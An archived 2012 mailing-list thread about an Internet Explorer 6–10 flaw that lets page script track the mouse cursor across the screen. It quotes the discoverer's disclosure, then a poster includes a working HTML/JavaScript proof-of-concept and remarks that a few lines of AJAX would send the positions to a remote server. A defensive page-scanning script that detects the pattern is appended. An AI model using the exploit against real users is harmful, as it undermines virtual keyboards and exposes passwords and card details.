[dba-Tech] Internet Explorer Data Leakage (versions 6 to 10)

Jim Lawrence accessd at shaw.ca
Thu Dec 13 21:41:08 CST 2012


Too bad.

Jim

-----Original Message-----
From: dba-tech-bounces at databaseadvisors.com
[mailto:dba-tech-bounces at databaseadvisors.com] On Behalf Of Hans-Christian
Andersen
Sent: Thursday, December 13, 2012 1:20 PM
To: Discussion of Hardware and Software issues
Subject: Re: [dba-Tech] Internet Explorer Data Leakage (versions 6 to 10)


You can if you exit the Metro interface and run it as a desktop application.
As far as browsers go while in Metro, you only get IE.

This, of course, means that you are not able to run anything other than IE
on any Surface tablets running Windows RT.

- Hans



On 2012-12-13, at 12:58 PM, "Jim Lawrence" <accessd at shaw.ca> wrote:

> I am being facetious. 
> 
> Only if you are running IE as your browser. One question comes to mind;
> Can you use any other browser than IE on the new Win8 product line?
> 
> Jim
> 
> -----Original Message-----
> From: dba-tech-bounces at databaseadvisors.com
> [mailto:dba-tech-bounces at databaseadvisors.com] On Behalf Of Hans-Christian
> Andersen
> Sent: Thursday, December 13, 2012 12:37 PM
> To: Discussion of Hardware and Software issues
> Subject: Re: [dba-Tech] Internet Explorer Data Leakage (versions 6 to 10)
> 
> 
>> The choice now is either stop using all tablets and Smartphones or stop
>> using IE until a universal fix is built and distributed. Better safe than
>> sorry.
> 
> All tablets and smartphones?
> 
> - Hans
> 
> 
> 
> On 2012-12-13, at 12:32 PM, "Jim Lawrence" <accessd at shaw.ca> wrote:
> 
>> You mean this demo?
>> 
>> <!DOCTYPE html>
>> <html>
>> <head>
>> <meta charset="utf-8" />
>> <title>Exploit Demo</title>
>> <script type="text/javascript">
>>   window.attachEvent("onload", function() {
>>     var detector = document.getElementById("detector");
>>     detector.attachEvent("onmousemove", function (e) {
>>       detector.innerHTML = e.screenX + ", " + e.screenY;
>>     });
>>     setInterval(function () {
>>       detector.fireEvent("onmousemove");
>>     }, 100);
>>   });
>> </script>
>> </head>
>> <body>
>> <div id="detector"></div>
>> </body>
>> </html>
>> 
>> These types of compromise should be out there so everyone knows them, as
>> rest assured, every person in the malware business is already fully versed
>> in this exploit. Really it is only four to five lines of code and not
>> particularly difficult code. You would have to add an AJAX piece of code
>> to collect the positions remotely of course but that would also be less
>> than ten lines of additional code; four lines if you have attached the
>> jQuery library.
>> 
>> The choice now is either stop using all tablets and Smartphones or stop
>> using IE until a universal fix is built and distributed. Better safe than
>> sorry.
>> 
>> Jim
>> 
>> -----Original Message-----
>> From: dba-tech-bounces at databaseadvisors.com
>> [mailto:dba-tech-bounces at databaseadvisors.com] On Behalf Of Hans-Christian
>> Andersen
>> Sent: Thursday, December 13, 2012 1:18 AM
>> To: Discussion of Hardware and Software issues
>> Subject: [dba-Tech] Internet Explorer Data Leakage (versions 6 to 10)
>> 
>> 
>> http://spider.io/blog/2012/12/internet-explorer-data-leakage/
>> 
>> This is a pretty severe security issue. All it takes is a little bit of
>> JavaScript on any site you visit and they are able to fully track where
>> your mouse is on your screen (even when IE is minimized). All versions of
>> IE are vulnerable to this starting from IE 6. It's already being exploited
>> in the wild.
>> 
>> There is a demo included as a link, if you want to test this out yourself.
>> 
>> - Hans
>> 
>> 
>> Excerpt from link:
>> _______________
>> 
>> "On the 1st of October, 2012, we disclosed to Microsoft the following
>> security vulnerability in Internet Explorer, versions 6-10, which allows
>> your mouse cursor to be tracked anywhere on the screen - even if the
>> Internet Explorer window is minimised. The vulnerability is particularly
>> troubling because it compromises the security of virtual keyboards and
>> virtual keypads.
>> 
>> The motivation for using a virtual keyboard is typically that it reduces
>> the chance of a keylogger recording one's keypresses and thereby
>> compromising one's passwords or credit card details. (c.f. bit.ly/YnNBYE;
>> bit.ly/VpapWf)
>> 
>> Whilst the Microsoft Security Research Center has acknowledged the
>> vulnerability in Internet Explorer, they have also stated that there are
>> no immediate plans to patch this vulnerability in existing versions of the
>> browser. It is important for users of Internet Explorer to be made aware
>> of this vulnerability and its implications.
>> 
>> The vulnerability is already being exploited by at least two display ad
>> analytics companies across billions of page impressions per month."
>> 
>> 
>> _______________________________________________
>> dba-Tech mailing list
>> dba-Tech at databaseadvisors.com
>> http://databaseadvisors.com/mailman/listinfo/dba-tech
>> Website: http://www.databaseadvisors.com
>> 


_______________________________________________
dba-Tech mailing list
dba-Tech at databaseadvisors.com
http://databaseadvisors.com/mailman/listinfo/dba-tech
Website: http://www.databaseadvisors.com
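
Added example (not part of the thread or of the spider.io post): a static triage check a defender could run over page source to flag the pattern the quoted demo relies on, a script that fires its own mouse event and then reads screen coordinates from it. The indicator names, the three result levels and both sample pages are constructed for this illustration.

```javascript
// Added example: static triage for the cursor-tracking pattern in the quoted demo.
// Indicator names and the scoring levels are assumptions made for this illustration.
const INDICATORS = {
  // Script synthesises a mouse event itself instead of waiting for the user.
  syntheticMouseEvent: /\.fireEvent\s*\(\s*["']onmouse(?:move|over|out|down|up)["']/i,
  // Script reads screen-relative (not page-relative) cursor coordinates.
  screenCoords: /\.\s*screen[XY]\b/,
  // Script repeats work on a timer, i.e. polling.
  timer: /\bset(?:Interval|Timeout)\s*\(/,
};

// Pull the bodies of inline <script> elements out of an HTML string.
function inlineScripts(html) {
  const out = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Remove JS comments so commented-out code does not trigger a finding.
function stripComments(js) {
  return js.replace(/\/\*[\s\S]*?\*\//g, "").replace(/(^|[^:])\/\/.*$/gm, "$1");
}

// Classify one HTML document: "high" = synthetic mouse event + screen coords,
// "review" = only one of the two, "none" = neither.
function scanPage(html) {
  const code = inlineScripts(html).map(stripComments).join("\n");
  const hits = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(code));
  const synth = hits.includes("syntheticMouseEvent");
  const coords = hits.includes("screenCoords");
  const level = synth && coords ? "high" : synth || coords ? "review" : "none";
  return { level, polling: synth && hits.includes("timer"), hits };
}

// Constructed samples: the first mirrors the structure of the quoted demo,
// the second is an ordinary handler that only runs on real user input.
const SAMPLE_TRACKER = `<script>
  el.attachEvent("onmousemove", function (e) { out = e.screenX + "," + e.screenY; });
  setInterval(function () { el.fireEvent("onmousemove"); }, 100);
</script>`;
const SAMPLE_BENIGN = `<script>
  // el.fireEvent("onmousemove") was removed
  el.onmousemove = function (e) { tip.style.left = e.clientX + "px"; };
</script>`;

console.log(scanPage(SAMPLE_TRACKER), scanPage(SAMPLE_BENIGN));
```

A "review" result (screen coordinates read without a synthetic event, or the reverse) is common in legitimate drag-and-drop code, so only the combined "high" result is worth alerting on.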


